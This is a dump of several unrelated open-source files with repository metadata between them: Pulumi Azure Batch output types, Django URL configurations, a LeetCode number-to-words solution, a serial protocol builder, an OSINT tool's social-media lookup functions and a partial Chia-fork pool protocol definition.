"""
This property is ignored if specified on a Windows pool. If not specified, the user is created with the default options.
"""
return pulumi.get(self, "linux_user_configuration")
@property
@pulumi.getter(name="windowsUserConfiguration")
def windows_user_configuration(self) -> Optional['outputs.WindowsUserConfigurationResponse']:
"""
This property can only be specified if the user is on a Windows pool. If not specified and on a Windows pool, the user is created with the default options.
"""
return pulumi.get(self, "windows_user_configuration")
@pulumi.output_type
class UserIdentityResponse(dict):
"""
Specify either the userName or autoUser property, but not both.
"""
@staticmethod
def __key_warning(key: str):
suggest = None
if key == "autoUser":
suggest = "auto_user"
elif key == "userName":
suggest = "user_name"
if suggest:
pulumi.log.warn(f"Key '{key}' not found in UserIdentityResponse. Access the value via the '{suggest}' property getter instead.")
def __getitem__(self, key: str) -> Any:
UserIdentityResponse.__key_warning(key)
return super().__getitem__(key)
def get(self, key: str, default = None) -> Any:
UserIdentityResponse.__key_warning(key)
return super().get(key, default)
def __init__(__self__, *,
auto_user: Optional['outputs.AutoUserSpecificationResponse'] = None,
user_name: Optional[str] = None):
"""
Specify either the userName or autoUser property, but not both.
:param 'AutoUserSpecificationResponse' auto_user: The userName and autoUser properties are mutually exclusive; you must specify one but not both.
:param str user_name: The userName and autoUser properties are mutually exclusive; you must specify one but not both.
"""
if auto_user is not None:
pulumi.set(__self__, "auto_user", auto_user)
if user_name is not None:
pulumi.set(__self__, "user_name", user_name)
@property
@pulumi.getter(name="autoUser")
def auto_user(self) -> Optional['outputs.AutoUserSpecificationResponse']:
"""
The userName and autoUser properties are mutually exclusive; you must specify one but not both.
"""
return pulumi.get(self, "auto_user")
@property
@pulumi.getter(name="userName")
def user_name(self) -> Optional[str]:
"""
The userName and autoUser properties are mutually exclusive; you must specify one but not both.
"""
return pulumi.get(self, "user_name")
@pulumi.output_type
class VMExtensionResponse(dict):
@staticmethod
def __key_warning(key: str):
suggest = None
if key == "autoUpgradeMinorVersion":
suggest = "auto_upgrade_minor_version"
elif key == "protectedSettings":
suggest = "protected_settings"
elif key == "provisionAfterExtensions":
suggest = "provision_after_extensions"
elif key == "typeHandlerVersion":
suggest = "type_handler_version"
if suggest:
pulumi.log.warn(f"Key '{key}' not found in VMExtensionResponse. Access the value via the '{suggest}' property getter instead.")
def __getitem__(self, key: str) -> Any:
VMExtensionResponse.__key_warning(key)
return super().__getitem__(key)
def get(self, key: str, default = None) -> Any:
VMExtensionResponse.__key_warning(key)
return super().get(key, default)
def __init__(__self__, *,
name: str,
publisher: str,
type: str,
auto_upgrade_minor_version: Optional[bool] = None,
protected_settings: Optional[Any] = None,
provision_after_extensions: Optional[Sequence[str]] = None,
settings: Optional[Any] = None,
type_handler_version: Optional[str] = None):
"""
:param bool auto_upgrade_minor_version: Indicates whether the extension should use a newer minor version if one is available at deployment time. Once deployed, however, the extension will not upgrade minor versions unless redeployed, even with this property set to true.
:param Any protected_settings: The extension can contain either protectedSettings or protectedSettingsFromKeyVault or no protected settings at all.
:param Sequence[str] provision_after_extensions: Collection of extension names after which this extension needs to be provisioned.
"""
pulumi.set(__self__, "name", name)
pulumi.set(__self__, "publisher", publisher)
pulumi.set(__self__, "type", type)
if auto_upgrade_minor_version is not None:
pulumi.set(__self__, "auto_upgrade_minor_version", auto_upgrade_minor_version)
if protected_settings is not None:
pulumi.set(__self__, "protected_settings", protected_settings)
if provision_after_extensions is not None:
pulumi.set(__self__, "provision_after_extensions", provision_after_extensions)
if settings is not None:
pulumi.set(__self__, "settings", settings)
if type_handler_version is not None:
pulumi.set(__self__, "type_handler_version", type_handler_version)
@property
@pulumi.getter
def name(self) -> str:
return pulumi.get(self, "name")
@property
@pulumi.getter
def publisher(self) -> str:
return pulumi.get(self, "publisher")
@property
@pulumi.getter
def type(self) -> str:
return pulumi.get(self, "type")
@property
@pulumi.getter(name="autoUpgradeMinorVersion")
def auto_upgrade_minor_version(self) -> Optional[bool]:
"""
Indicates whether the extension should use a newer minor version if one is available at deployment time. Once deployed, however, the extension will not upgrade minor versions unless redeployed, even with this property set to true.
"""
return pulumi.get(self, "auto_upgrade_minor_version")
@property
@pulumi.getter(name="protectedSettings")
def protected_settings(self) -> Optional[Any]:
"""
The extension can contain either protectedSettings or protectedSettingsFromKeyVault or no protected settings at all.
"""
return pulumi.get(self, "protected_settings")
@property
@pulumi.getter(name="provisionAfterExtensions")
def provision_after_extensions(self) -> Optional[Sequence[str]]:
"""
Collection of extension names after which this extension needs to be provisioned.
"""
return pulumi.get(self, "provision_after_extensions")
@property
@pulumi.getter
def settings(self) -> Optional[Any]:
return pulumi.get(self, "settings")
@property
@pulumi.getter(name="typeHandlerVersion")
def type_handler_version(self) -> Optional[str]:
return pulumi.get(self, "type_handler_version")
@pulumi.output_type
class VirtualMachineConfigurationResponse(dict):
@staticmethod
def __key_warning(key: str):
suggest = None
if key == "imageReference":
suggest = "image_reference"
elif key == "nodeAgentSkuId":
suggest = "node_agent_sku_id"
elif key == "containerConfiguration":
suggest = "container_configuration"
elif key == "dataDisks":
suggest = "data_disks"
elif key == "diskEncryptionConfiguration":
suggest = "disk_encryption_configuration"
elif key == "licenseType":
suggest = "license_type"
elif key == "nodePlacementConfiguration":
suggest = "node_placement_configuration"
elif key == "windowsConfiguration":
suggest = "windows_configuration"
if suggest:
pulumi.log.warn(f"Key '{key}' not found in VirtualMachineConfigurationResponse. Access the value via the '{suggest}' property getter instead.")
def __getitem__(self, key: str) -> Any:
VirtualMachineConfigurationResponse.__key_warning(key)
return super().__getitem__(key)
def get(self, key: str, default = None) -> Any:
VirtualMachineConfigurationResponse.__key_warning(key)
return super().get(key, default)
def __init__(__self__, *,
image_reference: 'outputs.ImageReferenceResponse',
node_agent_sku_id: str,
container_configuration: Optional['outputs.ContainerConfigurationResponse'] = None,
data_disks: Optional[Sequence['outputs.DataDiskResponse']] = None,
disk_encryption_configuration: Optional['outputs.DiskEncryptionConfigurationResponse'] = None,
extensions: Optional[Sequence['outputs.VMExtensionResponse']] = None,
license_type: Optional[str] = None,
node_placement_configuration: Optional['outputs.NodePlacementConfigurationResponse'] = None,
windows_configuration: Optional['outputs.WindowsConfigurationResponse'] = None):
"""
:param str node_agent_sku_id: The Batch node agent is a program that runs on each node in the pool, and provides the command-and-control interface between the node and the Batch service. There are different implementations of the node agent, known as SKUs, for different operating systems. You must specify a node agent SKU which matches the selected image reference. To get the list of supported node agent SKUs along with their list of verified image references, see the 'List supported node agent SKUs' operation.
:param 'ContainerConfigurationResponse' container_configuration: If specified, setup is performed on each node in the pool to allow tasks to run in containers. All regular tasks and job manager tasks run on this pool must specify the containerSettings property, and all other tasks may specify it.
:param Sequence['DataDiskResponse'] data_disks: This property must be specified if the compute nodes in the pool need to have empty data disks attached to them.
:param 'DiskEncryptionConfigurationResponse' disk_encryption_configuration: If specified, encryption is performed on each node in the pool during node provisioning.
:param Sequence['VMExtensionResponse'] extensions: If specified, the extensions mentioned in this configuration will be installed on each node.
:param str license_type: This only applies to images that contain the Windows operating system, and should only be used when you hold valid on-premises licenses for the nodes which will be deployed. If omitted, no on-premises licensing discount is applied. Values are:
Windows_Server - The on-premises license is for Windows Server.
Windows_Client - The on-premises license is for Windows Client.
:param 'NodePlacementConfigurationResponse' node_placement_configuration: This configuration will specify rules on how nodes in the pool will be physically allocated.
:param 'WindowsConfigurationResponse' windows_configuration: This property must not be specified if the imageReference specifies a Linux OS image.
"""
pulumi.set(__self__, "image_reference", image_reference)
pulumi.set(__self__, "node_agent_sku_id", node_agent_sku_id)
if container_configuration is not None:
pulumi.set(__self__, "container_configuration", container_configuration)
if data_disks is not None:
pulumi.set(__self__, "data_disks", data_disks)
if disk_encryption_configuration is not None:
pulumi.set(__self__, "disk_encryption_configuration", disk_encryption_configuration)
if extensions is not None:
pulumi.set(__self__, "extensions", extensions)
if license_type is not None:
pulumi.set(__self__, "license_type", license_type)
if node_placement_configuration is not None:
pulumi.set(__self__, "node_placement_configuration", node_placement_configuration)
if windows_configuration is not None:
pulumi.set(__self__, "windows_configuration", windows_configuration)
@property
@pulumi.getter(name="imageReference")
def image_reference(self) -> 'outputs.ImageReferenceResponse':
return pulumi.get(self, "image_reference")
@property
@pulumi.getter(name="nodeAgentSkuId")
def node_agent_sku_id(self) -> str:
"""
The Batch node agent is a program that runs on each node in the pool, and provides the command-and-control interface between the node and the Batch service. There are different implementations of the node agent, known as SKUs, for different operating systems. You must specify a node agent SKU which matches the selected image reference. To get the list of supported node agent SKUs along with their list of verified image references, see the 'List supported node agent SKUs' operation.
"""
return pulumi.get(self, "node_agent_sku_id")
@property
@pulumi.getter(name="containerConfiguration")
def container_configuration(self) -> Optional['outputs.ContainerConfigurationResponse']:
"""
If specified, setup is performed on each node in the pool to allow tasks to run in containers. All regular tasks and job manager tasks run on this pool must specify the containerSettings property, and all other tasks may specify it.
"""
return pulumi.get(self, "container_configuration")
@property
@pulumi.getter(name="dataDisks")
def data_disks(self) -> Optional[Sequence['outputs.DataDiskResponse']]:
"""
This property must be specified if the compute nodes in the pool need to have empty data disks attached to them.
"""
return pulumi.get(self, "data_disks")
@property
@pulumi.getter(name="diskEncryptionConfiguration")
def disk_encryption_configuration(self) -> Optional['outputs.DiskEncryptionConfigurationResponse']:
"""
If specified, encryption is performed on each node in the pool during node provisioning.
"""
return pulumi.get(self, "disk_encryption_configuration")
@property
@pulumi.getter
def extensions(self) -> Optional[Sequence['outputs.VMExtensionResponse']]:
"""
If specified, the extensions mentioned in this configuration will be installed on each node.
"""
return pulumi.get(self, "extensions")
@property
@pulumi.getter(name="licenseType")
def license_type(self) -> Optional[str]:
"""
This only applies to images that contain the Windows operating system, and should only be used when you hold valid on-premises licenses for the nodes which will be deployed. If omitted, no on-premises licensing discount is applied. Values are:
Windows_Server - The on-premises license is for Windows Server.
Windows_Client - The on-premises license is for Windows Client.
"""
return pulumi.get(self, "license_type")
@property
@pulumi.getter(name="nodePlacementConfiguration")
def node_placement_configuration(self) -> Optional['outputs.NodePlacementConfigurationResponse']:
"""
This configuration will specify rules on how nodes in the pool will be physically allocated.
"""
return pulumi.get(self, "node_placement_configuration")
@property
@pulumi.getter(name="windowsConfiguration")
def windows_configuration(self) -> Optional['outputs.WindowsConfigurationResponse']:
"""
This property must not be specified if the imageReference specifies a Linux OS image.
"""
return pulumi.get(self, "windows_configuration")
@pulumi.output_type
class VirtualMachineFamilyCoreQuotaResponse(dict):
"""
A VM Family and its associated core quota for the Batch account.
"""
@staticmethod
def __key_warning(key: str):
suggest = None
if key == "coreQuota":
suggest = "core_quota"
if suggest:
pulumi.log.warn(f"Key '{key}' not found in VirtualMachineFamilyCoreQuotaResponse. Access the value via the '{suggest}' property getter instead.")
def __getitem__(self, key: str) -> Any:
VirtualMachineFamilyCoreQuotaResponse.__key_warning(key)
return super().__getitem__(key)
def get(self, key: str, default = None) -> Any:
VirtualMachineFamilyCoreQuotaResponse.__key_warning(key)
return super().get(key, default)
def __init__(__self__, *,
core_quota: int,
name: str):
"""
A VM Family and its associated core quota for the Batch account.
:param int core_quota: The core quota for the VM family for the Batch account.
:param str name: The Virtual Machine family name.
"""
pulumi.set(__self__, "core_quota", core_quota)
pulumi.set(__self__, "name", name)
@property
@pulumi.getter(name="coreQuota")
def core_quota(self) -> int:
"""
The core quota for the VM family for the Batch account.
"""
return pulumi.get(self, "core_quota")
@property
@pulumi.getter
def name(self) -> str:
"""
The Virtual Machine family name.
"""
return pulumi.get(self, "name")
@pulumi.output_type
class WindowsConfigurationResponse(dict):
@staticmethod
def __key_warning(key: str):
suggest = None
if key == "enableAutomaticUpdates":
suggest = "enable_automatic_updates"
if suggest:
pulumi.log.warn(f"Key '{key}' not found in WindowsConfigurationResponse. Access the value via the '{suggest}' property getter instead.")
def __getitem__(self, key: str) -> Any:
WindowsConfigurationResponse.__key_warning(key)
return super().__getitem__(key)
def get(self, key: str, default = None) -> Any:
WindowsConfigurationResponse.__key_warning(key)
return super().get(key, default)
def __init__(__self__, *,
enable_automatic_updates: Optional[bool] = None):
"""
:param bool enable_automatic_updates: If omitted, the default value is true.
"""
if enable_automatic_updates is not None:
pulumi.set(__self__, "enable_automatic_updates", enable_automatic_updates)
@property
@pulumi.getter(name="enableAutomaticUpdates")
def enable_automatic_updates(self) -> Optional[bool]:
"""
If omitted, the default value is true.
"""
return pulumi.get(self, "enable_automatic_updates")
@pulumi.output_type
class WindowsUserConfigurationResponse(dict):
@staticmethod
def __key_warning(key: str):
suggest = None
if key == "loginMode":
suggest = "login_mode"
if suggest:
pulumi.log.warn(f"Key '{key}' not found in WindowsUserConfigurationResponse. Access the value via the '{suggest}' property getter instead.")
def __getitem__(self, key: str) -> Any:
WindowsUserConfigurationResponse.__key_warning(key)
return super().__getitem__(key)
def get(self, key: str, default = None) -> Any:
WindowsUserConfigurationResponse.__key_warning(key)
return super().get(key, default)
def __init__(__self__, *,
login_mode: Optional[str] = None):
"""
:param str login_mode: Specifies login mode for the user. The default value for VirtualMachineConfiguration pools is interactive mode and for CloudServiceConfiguration pools is batch mode.
"""
if login_mode is not None:
pulumi.set(__self__, "login_mode", login_mode)
@property
@pulumi.getter(name="loginMode")
def login_mode(self) -> Optional[str]:
"""
Specifies login mode for the user. The default value for VirtualMachineConfiguration pools is interactive mode and for CloudServiceConfiguration pools is batch mode.
"""
return pulumi.get(self, "login_mode")
| [
"noreply@github.com"
] | morrell.noreply@github.com |
13b03308cf7b6535f6bf15ad2090240da75658b2 | bfee360e228494749ce1f73f7bc48cf5f4698d3a | /excelplay_echo/core/urls.py | 25ee96a89465e3093bf6586026db47af2fb93213 | [] | no_license | Excel-MEC/excelplay-echo | 0cc1f8d2305c107f95c8e72f7929651ec44c2b0f | 2b062e2a783adb7abeb05420c0761734fa1d368f | refs/heads/master | 2021-04-18T21:26:59.333703 | 2019-01-14T17:34:54 | 2019-01-14T17:34:54 | 126,799,930 | 1 | 1 | null | 2018-10-26T09:13:41 | 2018-03-26T08:47:40 | Python | UTF-8 | Python | false | false | 321 | py | from django.urls import path
from core.views import Submissionform,Problem,handshake
urlpatterns =[
# path('leaderboard',Echoleaderboard.as_view(),name='leaderboard'),
path('submit',Submissionform,name='finalsubmit'),
path('probs',Problem,name='Problems'),
path('handshake',handshake,name='handshake')
]
| [
"kurian.pro@gmail.com"
] | kurian.pro@gmail.com |
859ec81a3750696e6e42c17160e3397d0d0753fb | accdde552cda99d0fa328441bebdc7ce78b74f36 | /venv/Session6I.py | 4f258afe71ea77a573b36943755b33675423d95e | [] | no_license | navnoorsingh13/GW2019PA2 | 056f0b3d293d8a6f3ec149c8de01c96f0d46f826 | b94b2a5e1c6a760a5ada87e3f7a3117da552387d | refs/heads/master | 2022-01-17T13:20:57.446539 | 2019-07-19T10:53:37 | 2019-07-19T10:53:37 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 237 | py | # Pass By Reference
def squareOfNumbers(nums):
for i in range(0, len(nums)):
nums[i] = nums[i] * nums[i]
numbers = [1, 2, 3, 4, 5]
squareOfNumbers(numbers)
print(numbers)
def fun(a, b, c):
pass
fun(a=10, c=20, b=30) | [
"er.ishant@gmail.com"
] | er.ishant@gmail.com |
ccd38499deb46018021dc170d1176876dd50b27e | 9f3488ddfdb02165f1be9a3ce3a4a3468af0e793 | /leetcode/273.integer-to-english-words.py | ca6936b235ba2fbf36945ffa81071a42077ea446 | [] | no_license | szr22/algorithm | b76646799272b81ea6dd179f0d07dba64d9b10d2 | bcf18a6583303dbd5a10776d2c70181b0733defb | refs/heads/master | 2022-05-13T13:59:27.471727 | 2022-04-15T18:27:55 | 2022-04-15T18:27:55 | 190,107,858 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,709 | py | #
# @lc app=leetcode id=273 lang=python3
#
# [273] Integer to English Words
#
# @lc code=start
class Solution:
def __init__(self):
self.dictLessTwenty = ["", "One", "Two", "Three", "Four", "Five", "Six", "Seven", "Eight", "Nine", "Ten", "Eleven", "Twelve", "Thirteen", "Fourteen", "Fifteen", "Sixteen", "Seventeen", "Eighteen", "Nineteen"]
self.dictTens = ["", "", "Twenty", "Thirty", "Forty", "Fifty", "Sixty", "Seventy", "Eighty", "Ninety"]
self.dictMoreHundred = ["Thousand", "Million", "Billion"]
def numberToWords(self, num: int) -> str:
res = self.numberToHundred(num%1000)
for i in range(3):
num //= 1000
if num % 1000 == 0:
res
else:
res = self.numberToHundred(num % 1000) + ' ' + self.dictMoreHundred[i] + ' ' + res
while res and res[-1] == ' ':
res = res[:-1]
if not res:
return 'Zero'
else:
return res
def numberToHundred(self, num: int) -> str:
res = ''
hundredNum = num // 100
hundredRemainderNum = num % 100
tenRemainderNum = num % 10
if hundredRemainderNum<20:
res = self.dictLessTwenty[hundredRemainderNum]
else:
res = self.dictTens[hundredRemainderNum//10]
if tenRemainderNum > 0:
res += ' ' + self.dictLessTwenty[tenRemainderNum]
if hundredNum>0:
if hundredRemainderNum>0:
res = ' ' + res
res = self.dictLessTwenty[hundredNum] + ' Hundred' + res
return res
# @lc code=end
num = 1234567891
num = 1051
res = Solution().numberToWords(num)
print(res) | [
"shizhenrong1987@hotmail.com"
] | shizhenrong1987@hotmail.com |
e889548a187ca2c0ffa106a9c7a66ec640690c87 | ab8a1749aa2b1ad5f5d6fde4ad83702b306c9946 | /bowler/_bowlerv3.py | 1feb828fe6c62dbfc524677718fea104647aa980 | [] | no_license | Auzzy/python-dyio | ae85fdf5cdf17c59f6923e0a7c3eccd97bdddc3a | 60ccc8b311ff23f897b102524fd5ebdf847a4b3a | refs/heads/master | 2016-09-01T09:26:24.517331 | 2013-03-10T21:36:29 | 2013-03-10T21:36:29 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,452 | py | from bowler import _DatagramBuilder,_DatagramParser
LENGTH = 11
class Affect(object):
STATUS = 0x00
GET = 0x10
POST = 0x20
CRIT = 0x30
ASYNC = 0x40
class _Builder(_DatagramBuilder):
@staticmethod
def build(mac, func, args, affect, ns):
mac = mac.replace(':',' ')
payload = _Builder._build_payload(func,args)
header = _Builder._build_header(mac,affect,ns,len(payload))
return header + payload
@staticmethod
def _build_header(mac, affect, ns, payload_size):
header = bytearray()
header.append(0x3)
header.extend(bytearray.fromhex(mac))
header.append(affect)
header.append((ns << 1) | 0)
header.append(payload_size)
header.append(sum(header) & 0x000000FF)
return header
@staticmethod
def _build_payload(func, args):
func_bytes = bytearray(4-len(func)) + bytearray(func,"hex")
arg_bytes = _Builder.args_to_bytes(args)
return func_bytes + arg_bytes
class _Parser(_DatagramParser):
@staticmethod
def parse(port, header):
affect,dir,length = _Parser._parse_header(header)
func = bytearray(port.read(length))
if not func:
raise SerialTimeoutException("A timeout occurred while reading an incoming packet.")
name,args = _Parser._parse_func(func)
return name,args,affect,dir
@staticmethod
def _parse_header(header):
mac = header[1:7]
affect = header[7]
ns = header[8] >> 1
dir = header[8] & 0x1
length = header[9]
checksum = header[10]
data_checksum = sum(header[:10]) & 0x000000FF
if checksum!=data_checksum:
raise IOError("The received data was corrupted.")
return affect,dir,length
@staticmethod
def _parse_func(func):
return func[:4],func[4:]
def _get_affect(priority, state, async):
if priority==0:
return Affect.CRIT
elif state:
return Affect.POST
elif async:
return Affect.ASYNC
else:
return Affect.GET
def _unpack_affect(affect):
if affect==Affect.CRIT:
return 0,False,False
elif affect==Affect.POST:
return 32,True,False
elif affect==Affect.ASYNC:
return 32,False,True
else:
return 32,False,False
def build(mac, func, args=[], priority=32, state=False, async=False, encrypted=False, ns=0x0):
affect = _get_affect(priority,state,async)
return _Builder.build(mac,func,args,affect,ns)
# RETURN: func, args, priority, state, async, dir, encrypted
def parse(port, header):
func,args,affect,dir = _Parser.parse(port,header)
priority,state,async = _unpack_affect(affect)
return func,args,priority,state,async,dir,False
| [
"metalnut4@netscape.net"
] | metalnut4@netscape.net |
f39f248f0bbe9ef7481745246946d51ff52cf137 | d2c4934325f5ddd567963e7bd2bdc0673f92bc40 | /tests/artificial/transf_Quantization/trend_Lag1Trend/cycle_7/ar_12/test_artificial_32_Quantization_Lag1Trend_7_12_20.py | 8aab6db49f32f6e1b077dd49b45246fcd79cf007 | [
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | jmabry/pyaf | 797acdd585842474ff4ae1d9db5606877252d9b8 | afbc15a851a2445a7824bf255af612dc429265af | refs/heads/master | 2020-03-20T02:14:12.597970 | 2018-12-17T22:08:11 | 2018-12-17T22:08:11 | 137,104,552 | 0 | 0 | BSD-3-Clause | 2018-12-17T22:08:12 | 2018-06-12T17:15:43 | Python | UTF-8 | Python | false | false | 272 | py | import pyaf.Bench.TS_datasets as tsds
import pyaf.tests.artificial.process_artificial_dataset as art
art.process_dataset(N = 32 , FREQ = 'D', seed = 0, trendtype = "Lag1Trend", cycle_length = 7, transform = "Quantization", sigma = 0.0, exog_count = 20, ar_order = 12); | [
"antoine.carme@laposte.net"
] | antoine.carme@laposte.net |
9c5539d8a3f55ac77c8088a89e80ba26627d0880 | 4751fd86184b64316d694a98671d34faae76ffe6 | /plannerrr/urls.py | 5440d164eca08d316b10eec4f88ad184fb5b72d6 | [] | no_license | mohammedaliyu136/dg_planner | 8a6a4888cc109d6c3a1cb115494a1e6decbb864a | a0fb87e182527e541e7758a2c4720ddbb2438145 | refs/heads/master | 2020-04-03T08:09:02.020426 | 2018-10-29T19:57:16 | 2018-10-29T19:57:16 | 155,124,132 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,225 | py | from plannerrr import views
from django.conf.urls import include, url
from django.contrib import admin
from plannerrr.advisor.views import edit_default_plan
urlpatterns = [
url(r'^$', views.index, name='index'),
url(r'^login/', views.login_user, name='login'),
url(r'^login_out/', views.logout_user, name='login'),
url(r'^profile/', views.profile, name='profile'),
url(r'^register/', views.register, name='register'),
url(r'^enroll_profile/', views.enroll_profile, name='profile'),
url(r'^indexx/', views.indexx, name='get_info'),
url(r'^degree_req/', views.degree_req, name='free_elective_req'),
url(r'^my_view/', views.my_view, name='my_view'),
url(r'^show_schedule/', views.show_schedule, name='planner'),
url(r'^search/', views.search, name='search'),
url(r'^student/(?P<pk>\d+)$', views.search_click, name='student'),
url(r'^students/$', views.search, name='students'),
url(r'^team/$', views.team, name='team'),
url(r'^plan/edit/$', views.edit_plan, name='team'),
url(r'^plan/generated/pdf/$', views.generate_pdf, name='pdf'),
url(r'^dashboard/', views.dashboard, name='dashboard'),
url(r'^getcourse/', views.get_course, name='get_course'),
]
| [
"mohammedaliyu136@gmail.com"
] | mohammedaliyu136@gmail.com |
a7116d737ea16e7b0521b8c9990f276ce7f27c42 | d0bdf444c71b724ecfd59b5bc6850962c56494cb | /homeworks/02-arrays_tables/tests/q2_2.py | b338149a2d1c1e8bf6590df93b420ef2042ceb53 | [] | no_license | ucsd-ets/dsc10-su20-public | 10e3d0ff452b337f222baee330fe60d1465b0071 | 38787e6cc3e6210b4cc8a46350e5120845971c9f | refs/heads/master | 2022-12-13T23:28:20.512649 | 2020-09-03T19:28:06 | 2020-09-03T19:28:06 | 275,905,339 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 404 | py | test = {
'name': 'Question 2_2',
'hidden': False,
'points': 1,
'suites': [
{
'cases': [
{
'code': r"""
>>> isinstance( new_allowances_constant , np.ndarray)
True
""",
'hidden': False,
'locked': False
}
],
'scored': True,
'setup': '',
'teardown': '',
'type': 'doctest'
}
]
}
| [
"eldridgejm@gmail.com"
] | eldridgejm@gmail.com |
3c2ffe9176682d22fb8791c366db0d1b969071f8 | f7deae8209a3ff66050780d5e59c8f2231f8139f | /profil3r/app/core/services/_social.py | a5abb6c74a823594b669110e37afced5602f1873 | [
"MIT"
] | permissive | cyber-workforce/Profil3r | 858b6ce3ad71bb4cf5d621a6bd18023d50538968 | ec308924850e0514416aaeaa9e96eabf658e2d0e | refs/heads/main | 2023-06-17T04:07:57.303282 | 2021-07-12T12:51:03 | 2021-07-12T12:51:03 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,041 | py | from profil3r.app.modules.social.facebook import Facebook
from profil3r.app.modules.social.twitter import Twitter
from profil3r.app.modules.social.tiktok import TikTok
from profil3r.app.modules.social.instagram import Instagram
from profil3r.app.modules.social.pinterest import Pinterest
from profil3r.app.modules.social.linktree import LinkTree
from profil3r.app.modules.social.myspace import MySpace
from profil3r.app.modules.social.flickr import Flickr
from profil3r.app.modules.social.goodread import GoodRead
# Facebook
def facebook(self):
self.result["facebook"] = Facebook(self.config, self.permutations_list).search()
# print results
self.print_results("facebook")
# Twitter
def twitter(self):
self.result["twitter"] = Twitter(self.config, self.permutations_list).search()
# print results
self.print_results("twitter")
# TikTok
def tiktok(self):
self.result["tiktok"] = TikTok(self.config, self.permutations_list).search()
# print results
self.print_results("tiktok")
# Instagram
def instagram(self):
self.result["instagram"] = Instagram(self.config, self.permutations_list).search()
# print results
self.print_results("instagram")
# Pinterest
def pinterest(self):
self.result["pinterest"] = Pinterest(self.config, self.permutations_list).search()
# print results
self.print_results("pinterest")
# LinkTree
def linktree(self):
self.result["linktree"] = LinkTree(self.config, self.permutations_list).search()
# print results
self.print_results("linktree")
# MySpace
def myspace(self):
self.result["myspace"] = MySpace(self.config, self.permutations_list).search()
# print results
self.print_results("myspace")
# Flickr
def flickr(self):
self.result["flickr"] = Flickr(self.config, self.permutations_list).search()
# print results
self.print_results("flickr")
# GoodRead
def goodread(self):
self.result["goodread"] = GoodRead(self.config, self.permutations_list).search()
# print results
self.print_results("goodread") | [
"r0g3r5@protonmail.com"
] | r0g3r5@protonmail.com |
91b6bd20ba16539afdb282384848c0db31a11601 | 111cac4319ff247d890926ddda4809a7ca6e6f25 | /ch02/02.py | edc962b02e51c769360fa1e35669d95871ace916 | [] | no_license | gebijiaxiaowang/FluentPython | c5c9838209524cbab0036f22ef6b75085b8ead53 | 700427ee872cd4c2a4b6466f7a214b7acc679580 | refs/heads/master | 2023-03-02T21:20:06.224311 | 2021-02-09T08:58:42 | 2021-02-09T08:58:42 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,162 | py | #!/usr/bin/python3.7
# -*- coding: utf-8 -*-
# @Time : 2020/12/31 15:25
# @Author : dly
# @File : 02.py
# @Desc :
import os
from collections import namedtuple
lax_coordinates = (33.9, -118.4)
# 元组拆包
latitude, longitude = lax_coordinates
print(latitude)
print(longitude)
# divmod(x, y)
# Return the tuple (x//y, x%y).
print(divmod(20, 8))
# 拆分路径和文件名
print(os.path.split('/home/python/test.py'))
# ('/home/python', 'test.py')
# 用 * 来处理剩下的元素
a, b, *c = range(5)
print(a, b, c)
# 具名元组
City = namedtuple('City', 'name country population coordinates')
# 字段
print(City._fields)
tokyo = City('Tokyo', 'JP', 36.9, (35.6, 239.6))
print(tokyo)
print(tokyo.population)
print(tokyo.coordinates)
# 转字典
print(tokyo._asdict())
# 切片赋值
l = list(range(10))
print(l)
l[2:5] = [20, 30]
print(l)
l[2:5] = [100]
print(l)
# 对序列使用 + 和 *
board = [['_'] * 3 for i in range(3)]
print(board)
board[1][2] = 'x'
print(board)
# 三个列表指向同一对象的引用
board = [['_'] * 3] * 3
print(board)
board[1][2] = '0'
print(board)
# +=
t = (1, 2, [30, 40])
t[2] += [50, 60]
print(t)
| [
"1083404373@qq.com"
] | 1083404373@qq.com |
ff4a5fc06618705dfc56f7d5407354cef5cb04bd | d943d1b6803bb3c44b3600a2b3728662d4a3de06 | /btcgreen/protocols/pool_protocol.py | 8156b5f25f7f6e48ecf3d376e3bbe60cd68eaabe | [
"Apache-2.0"
] | permissive | onuratakan/btcgreen-blockchain | 624575e3f484dcbb70dbbbfab46f7eeb92a5b709 | 03c9e27c483a0c3e6a34713dd9d2502eff7c25b2 | refs/heads/main | 2023-09-06T04:31:12.725344 | 2021-10-16T23:45:51 | 2021-10-16T23:45:51 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,027 | py | from dataclasses import dataclass
from enum import Enum
import time
from typing import Optional
from blspy import G1Element, G2Element
from btcgreen.types.blockchain_format.proof_of_space import ProofOfSpace
from btcgreen.types.blockchain_format.sized_bytes import bytes32
from btcgreen.util.ints import uint8, uint16, uint32, uint64
from btcgreen.util.streamable import Streamable, streamable
POOL_PROTOCOL_VERSION = uint8(1)
class PoolErrorCode(Enum):
REVERTED_SIGNAGE_POINT = 1
TOO_LATE = 2
NOT_FOUND = 3
INVALID_PROOF = 4
PROOF_NOT_GOOD_ENOUGH = 5
INVALID_DIFFICULTY = 6
INVALID_SIGNATURE = 7
SERVER_EXCEPTION = 8
INVALID_P2_SINGLETON_PUZZLE_HASH = 9
FARMER_NOT_KNOWN = 10
FARMER_ALREADY_KNOWN = 11
INVALID_AUTHENTICATION_TOKEN = 12
INVALID_PAYOUT_INSTRUCTIONS = 13
INVALID_SINGLETON = 14
DELAY_TIME_TOO_SHORT = 15
REQUEST_FAILED = 16
# Used to verify GET /farmer and GET /login
@dataclass(frozen=True)
@streamable
class AuthenticationPayload(Streamable):
method_name: str
launcher_id: bytes32
target_puzzle_hash: bytes32
authentication_token: uint64
# GET /pool_info
@dataclass(frozen=True)
@streamable
class GetPoolInfoResponse(Streamable):
name: str
logo_url: str
minimum_difficulty: uint64
relative_lock_height: uint32
protocol_version: uint8
fee: str
description: str
target_puzzle_hash: bytes32
authentication_token_timeout: uint8
# POST /partial
@dataclass(frozen=True)
@streamable
class PostPartialPayload(Streamable):
launcher_id: bytes32
authentication_token: uint64
proof_of_space: ProofOfSpace
sp_hash: bytes32
end_of_sub_slot: bool
harvester_id: bytes32
@dataclass(frozen=True)
@streamable
class PostPartialRequest(Streamable):
payload: PostPartialPayload
aggregate_signature: G2Element
# Response in success case
@dataclass(frozen=True)
@streamable
class PostPartialResponse(Streamable):
new_difficulty: uint64
# GET /farmer
